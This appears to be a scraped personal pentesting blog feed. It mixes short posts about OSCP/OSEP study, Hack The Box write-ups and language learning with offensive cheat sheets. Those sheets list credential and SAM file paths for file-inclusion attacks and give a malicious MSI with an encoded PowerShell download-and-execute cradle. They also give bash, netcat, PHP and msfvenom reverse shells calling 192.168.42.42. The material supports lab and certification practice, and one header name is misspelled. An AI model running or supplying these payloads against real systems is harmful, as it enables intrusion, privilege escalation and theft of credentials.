/proc/self/environ
/etc/passwd
/etc/hosts
/etc/exports

Windows

C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM
C:/Windows/repair/system C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

Web

Fri, 03 Oct 2025 00:00:00 +0000

IP restriction at application level - Bypass

Try to send a request modifying the HTTP header by adding:

X-Forwarder-For: <ip allowed>

Web Browser Plugins

Fri, 03 Oct 2025 00:00:00 +0000

https://www.wappalyzer.com/download/
https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ <—— For Firefox
https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp <—— For Chrome
https://cookie-editor.cgagnier.ca/#download
https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/

Web directorie/file scanner

Fri, 03 Oct 2025 00:00:00 +0000

Gobuster

Scan all the directories/files by extension:

gobuster dir -u http://192.168.24.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py -o webscan/gobuster-extensions

For scanning without extensions, just take out the -x

Nikto

Sometimes Nikto shows juicy information, I tend to run it like:

nikto -Format txt -o webscan/nikto-initial -host http://192.168.24.24 -p 8080

fuff

Web fuzzer, you can get fuff here, it basically bruteforces the dirs.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://192.168.24.24/FUZZ

Web Security

Fri, 03 Oct 2025 00:00:00 +0000

Windows

Fri, 03 Oct 2025 00:00:00 +0000

Trusted Folders

accesschk.exe "ceso" C:\ -wus
 -> -w is to locate writable directories
 -> -u supress errors
 -> -s makes recursion on all subdirectories

icacls.exe C:\Windows\Tasks
 ^-- Verify if Tasks has execution permissions for example (flag is "RX")

Check OS Information

systeminfo
ver

Check Architecture

Without PowerShell

wmic os get osarchitecture
echo %PROCESSOR_ARCHITECTURE%

With PowerShell

[Environment]::Is64BitProcess

Check the Type of Language available with Powershell

$ExecutionContext.SessionState.LanguageMode

Possible types are:
 - Full Language
 - RestrictedLanguage
 - No Language
 - Constrained Language

Windows

Fri, 03 Oct 2025 00:00:00 +0000

Always Install Elevated

If we have enabled a privilege which allow us to ALWAYS install with elevated privileges, we can craft a .msi leveranging wixt ools, specifically with candl.exe and light.exe. The steps are as follows:

1 - Create a malicious .xml wix file:

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
 <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacture
r="@_xpn_" Language="1033">
 <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
 <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
 <Directory Id="TARGETDIR" Name="SourceDir">
 <Directory Id="ProgramFilesFolder">
 <Directory Id="INSTALLLOCATION" Name="Example">
 <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
 </Component>
 </Directory>
 </Directory>
 </Directory>
 <Feature Id="DefaultFeature" Level="1">
 <ComponentRef Id="ApplicationFiles"/>
 </Feature>
 <CustomAction Id="SystemShell" Directory="TARGETDIR" ExeCommand="C:\Windows\System32\WindowsPowerShell\v1.0\powershell
.exe -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnAC
gAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA5ADIALwBuAGkAZQByAGkALgBwAHMAMQAnACkAOwBJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBj
AHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOA
AuADQAOQAuADkAMgAvAHIAdQBuAC0AcwBoAGUAbABsAGMAbwBkAGUALQA2ADQAYgBpAHQALgBwAHMAMQAtAGYAcgBvAG0AOQAyAC0AOAAwADgAMQBwAG8AcgB0ACcA
KQAKAA==" Execute="deferred" Impersonate="no" Return="ignore"/>
 <InstallExecuteSequence>
 <Custom Action="SystemShell" After="InstallInitialize"></Custom>
 </InstallExecuteSequence>
 </Product>
</Wix>

The powershell in b64 executed is this one:

Windows

Fri, 03 Oct 2025 00:00:00 +0000

General

Privilege Escalation

PowerShell

https://vipulvyas0813.medium.com/introduction-to-powershell-for-penetration-testing-733236bc9547 <—— Serie about Poers hell for Penetration Testing (5 posts)

Bash

Thu, 02 Oct 2025 00:00:00 +0000

bash -i >& /dev/tcp/192.168.42.42/443 0>&1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.42.42 443 >/tmp/f

Metasploit

Thu, 02 Oct 2025 00:00:00 +0000

Perl (example to deploy as cgi-bin)

msfvenom -p cmd/unix/reverse_perl LHOST="192.168.42.42" LPORT=443 -f raw -o reverse_shell.cgi

Java (example to deploy in Tomcat)

msfvenom -p java/shell_reverse_tcp LHOST=192.168.42.42 LPORT=443 -f war rev_shell.war

Windows - Download Reverse Shell

msfvenom -a x86 --platform windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient
).downloadString('http://192.168.42.42/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed BufferR
egister=EAX -f python

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.42.42 lport=443 -f csharp

We can also use it with the following parameters for migration

PHP

Thu, 02 Oct 2025 00:00:00 +0000

<?php $sock = fsockopen("192.168.42.42","443"); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1
=>$sock, 2=>$sock), $pipes); ?>

php -r '$sock=fsockopen("192.168.42.42",443);exec("/bin/sh -i <&3 >&3 2>&3");'

Wehmütig

Sun, 08 Jun 2025 00:00:00 +0000

Wehmütig

Wie der Donner, der dem vorbeiziehenden Blitz folgt, so umarmte sie mich - Verfinsterung

Zerdenken

Sat, 07 Jun 2025 00:00:00 +0000

Als es April 2022 war, habe ich einen Post auf Schwedisch geschreiben, weil ich angefangen habe, Schwedisch zu lernen. Ich erinnere mich nicht, wann genau ich aufgehört habe, Schwedisch zu lernen.

Im Februar 2023 bin ich nach Deutschland umgezogen. Als ich umgezogen bin, habe ich anfangen, um Deutsch zu lernen. Jetzt lerne ich seit ungefähr zwei Jahren Deutsch.

Es ist ein bisschen komisch, aber ich habe das Gefühl, dass ich etwas auf Deutsch ausdrucken kann, was ich in meiner Muttersprache (Spanisch) nicht konnte - sogar wenn ich viele Fehler mache.

SOC145 - Ransomware Detected

Fri, 24 Jun 2022 00:00:00 +0000

Quick Summary

Well, my lab time for OSWE/OSED courses just came to an end and I’m still way to far from being able to take their respective exams (still haven’t even reached the challenges, stuck on the material/excersises), so just as a way to take a short rest and a change of air from it, I decided to take a look around if there was anything similar to HTB but for Blue Team stuff (I barely know stuff related to it, besides my tasks as Appsec/DevSecOps whatever you want to call it mehh!), by doing this I ended up finding a web page called “Lets Defend”, it has some ctf alike games but focused exactly on the Blue Team side together with some Training content, which in a really easy and understandable way explains the 101 of SOC/Incident Response/SIEM, etc, pretty nice to have a quick and overview about that stuff, I liked it.

Hur jag är lär mig svenska

Sat, 09 Apr 2022 00:00:00 +0000

Förneka: Deta blogginlägget har mycket fel, jag vet det, men…jag vill bara skriva lite om hur jag lär mig svenska, så det är en lite öva för mig, ingenting allvarlig!

Vad kan säga jag? Jag gillar hur germanska språk ljud, och jag också gillar många metal-band från sverige (och svenska kultur), för det anledning beslutade jag lär mig svenska (i framtiden jag skulle vilja också lär tyska och holländska).

Three is Company: My adventure getting OSEP towards landing OSCE3

Tue, 25 Jan 2022 00:00:00 +0000

Preface

Twenty months have passed since ceso obtained his OSCP and just now in January/2022 got his OSEP, during this time he traveled from the old continent back to his hometown on the other side of the world as there was stuff he needed to sort out. Covid-19 (c-19), the pandemic that started in 2020, was still leaving havoc behind any place where it arrived, and the situation didn’t look like getting better any soon. His travel back was not the easiest one as it used to be before the c-19 attacked but still, as it was he was able to return without facing odds. Ceso saved some money and made ambitious objectives when it was still 2021; “I will get OSCE3!!!”, but…stuff doesn’t always go as expected or how we want, and his life started to go downhill in some aspects of his life, health started to be quite an issue and all his plans needed to be pushed aside and improving his health turned the top priority. Months passed and as he started to feel better, August of 2021 was running and decided it was time, he was ready to continue where he left, time to pick up before all started going downhill; time to go after OSEP and defeat it and the bosses that will be coming afterward (OSWE and OSED).

My Videos

Sun, 07 Mar 2021 00:00:00 +0000

To avoid Google’s YouTube cookies and doubleclick.net/ad_status.js tracking, this page only shows thumbnails via YouTube’s CDN. Should you want to watch a video, click the thumbnail and it will open in a new tab on YouTube. Hover over it first if you want to verify the link points to a valid domain.

A compilation of videos from Presentations/Live Streamings given by me.

Simulation of OSCP with Hack The Box and VulnHub machines

Apr 11, 2020

Q3liZXJzZWMgbXkgd2F 5IC0gUGFydCAxCg==

Sun, 14 Feb 2021 00:00:00 +0000

Preface

Lot of things have happend since the last time I posted something here, such as moving back to my country at the middle of last year to also stopping studying for some months due prioritizing my mental health (2020 was a bitch to all of us).

I already talked a bit about my background and how I started to study Cybersec in my prior post related to my experience with OSCP, you can go there and read about it if you want, but I will repeat some stuff here.

Hack The Box - Obscurity

Thu, 14 May 2020 00:00:00 +0000

Quick Summary

Well, the last months I have been really away from doing write-ups, specifically due to being full focused on my OSCP which I still can’t belive I passed!! I did an extensive write up about my experience going through it, if you still haven’t read it you can click here to go to it

I have more machines to do a write-up of, for example some of them are Postman, Traverxec, Mango, SolidState, OpenAdmin, Chatter Box among others, but well…I will try to do them as my time allows me hehe.

A Journey in the Dark - An adventure's tale towards OSCP

Mon, 27 Apr 2020 00:00:00 +0000

Preface

This is the story of how I got my OSCP coming from a background as Linux Sysadmin/DevOps as also which ones are my plans for the future.

Every tale where there is an adventurer, starts with him (the adventurer) and his friends, these who share the journey providing support and advice through it, as the story moves forward, new characters tend to appear, joining the adventurer in his travel.

Hack The Box - AI

Fri, 07 Feb 2020 00:00:00 +0000

Quick Summary

Finally, I’m posting the walk-through of this box, currently, I’m preparing my OSCP so most of my free time goes dedicated to it :D. At the time I did this box, I was only documenting with screenshots, so some dates could differ between the write up below as I accessed now to get plain text to not overload this with screenshots.

This was a box where for the foothold, you needed to upload a .wav file with a sql injection to get the reverse shell (the .wav is interpreted by an AI), and for the root you needed to exploit JWDP, the idea of using an AI for the foothold, was original kudos for that, but the implementation of it, and the multiple tries-error with different TTS I didn’t like it, in summary, was a box I didn’t feel like learning something new at all.

Hack The Box - Bitlab

Sat, 11 Jan 2020 00:00:00 +0000

Quick Summary

First than everything, I need to make clear that this box has 2 ways for doing privilege escalation: one is doing reversing and the other taking advantage of a misconfiguration with sudo and git. I will describe the steps for the sudo + git path as I’m just starting to do my first steps into more low-level stuff. Despite this, in the future I will actualize this post to reflect also the reversing path.

Hack The Box - Craft

Sat, 04 Jan 2020 00:00:00 +0000

Quick Summary

So!! Today was just retired Craft from Hack the box, this was a really fun box to do, and also I felt pretty well doing it, because even if I needed some nudges, it was actually the first box I got to the foothold without hints (elsen if I needed some guidance with python, thanks a lot @Frundrod!!), and afterward to get user I was a bit lost and also needed some hints (was not realizing something I have literally in my nose, thankss a lot @Fugl!), root was easy by a little bit of enumeration and reading help command output.

shutdown -r now

Sun, 22 Dec 2019 00:00:00 +0000

Note: First than everything, sorry the english, is not my native language and always learning new stuff about it.

I have always been thinking about writing a blog, but my mindset has always been the same “me? a blog? what am I supposed to post! I can’t even think anything I could share with people, I don’t know nothing compared to the people who blogs!”, currently that mindset has been changing. In the same way, maybe I read a really entry-level article and at some moment and it was (or is) helpful for me, it also could be helpful for another person as well things faced, the issues I ran into, etc…, and being some sort of way of escape for me itself, I think this change of mindset is the result of my last 9 months living abroad.

Whoami

Mon, 01 Jan 0001 00:00:00 +0000

Uruguayan rock climber nerd in love with learning new stuff all the time
DevOps/Linux Sysadmin
CyberSec enthusiast, wanting to make a jump into it in the future
OSCP/OSEP